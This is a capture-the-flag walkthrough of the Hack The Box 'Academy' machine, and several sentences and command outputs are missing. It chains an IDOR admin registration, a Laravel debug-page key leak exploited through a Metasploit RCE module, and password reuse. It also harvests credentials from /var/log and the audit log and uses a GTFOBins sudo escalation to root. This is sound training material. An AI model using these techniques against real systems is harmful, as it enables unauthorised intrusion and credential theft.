- Name: Academy
- Profile: www.hackthebox.eu
- Difficulty: Easy
- OS: Linux
- Points: 20
Install the tools used in this write-up on BlackArch Linux:
$ sudo pacman -S nmap ffuf metasploit gtfoblookup
Port and service discovery scan with nmap:
# Nmap 7.91 scan initiated Tue Feb 2 18:57:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.215
$ cat /etc/hosts | grep academy
Let's start with the web port, but keep in mind that there is an unusual port 33060 open too.
We can register and login at http://academy.htb/. But there is not much to see there.
So let's enumerate with ffuf:
$ ffuf -u http://academy.htb/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -fc 403
We notice there is an admin page.
Web exploitation: IDOR
When registering, the form submits a roleid parameter; if we change it from zero (user) to one (admin), we may get an admin account.
POST /register.php HTTP/1.1
Then we can log in at http://academy.htb/admin.php. If you leave roleid=0 you can't.
On the admin dashboard there is a to-do list with a status column:
| Task | Status |
|---|---|
| Complete initial set of modules (cry0l1t3 / mrb3n) | done |
| Finalize website design | done |
| Test all modules | done |
| Prepare launch campaign | done |
| Separate student and admin roles | done |
| Fix issue with dev-staging-01.academy.htb | pending |
Let's add the new subdomain to our hosts file.
$ cat /etc/hosts | grep academy
Web exploitation: Laravel RCE and debug mode
Let's go to http://dev-staging-01.academy.htb/
We are welcomed by the Laravel debug page.
Here we have a bunch of environment variables leaking secrets:
Searching for "laravel api key exploit", I found this one.
The RCE exploit requires the APP_KEY, which we already have from the leak.
msf6 exploit(unix/http/laravel_token_unserialize_exec) > options
Elevation of Privilege (EoP): from www-data to cry0l1t3
First let's get a full TTY.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
There are plenty of users we could target:
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cat /etc/passwd
Then I ran a recursive listing of the home directories with ls -lhAR /home:
- 21y4d: empty
- ch4p: empty
- cry0l1t3: the user flag is there, and stuff about lxd (useful for EoP)
  - /home/cry0l1t3/.mysql_history -> we don't have permission to read it
- egre55: empty
- g0blin: empty
- mrb3n: lots of files, among them:
  - /home/mrb3n/.config/composer/.htaccess -> deny from all
  - /home/mrb3n/.local/share/composer/.htaccess -> deny from all
Connecting to the DB fails with the MySQL creds found in /var/www/html/htb-academy-dev-01/.env (the same ones Laravel uses):
But with the ones
No luck either.
But when I tried reusing the password mySup3rP4s5w0rd!! for the user cry0l1t3 (remember, he had a .mysql_history in his home), it worked.
$ cat user.txt
Elevation of Privilege (EoP): from cry0l1t3 to mrb3n
As we are in the adm group, I ran find / -group adm -type f 2>/dev/null to list the files this group has access to.
We have access to all logs in
There are some interesting files, but passwords are redacted.
$ grep -ri password /var/log 2>/dev/null
It's possible that /var/log/audit/audit.log is logging the passwords typed during authentication attempts.
$ grep -r 'comm="sudo"' /var/log/audit
The password is hex-encoded.
$ printf %s '6D7262336E5F41634064336D79210A' | xxd -r -p
Elevation of Privilege (EoP): from mrb3n to root
mrb3n is a sudoer:
$ su mrb3n
So let's check GTFOBins for that one:
$ gtfoblookup update
So let's do that:
$ TF=$(mktemp -d)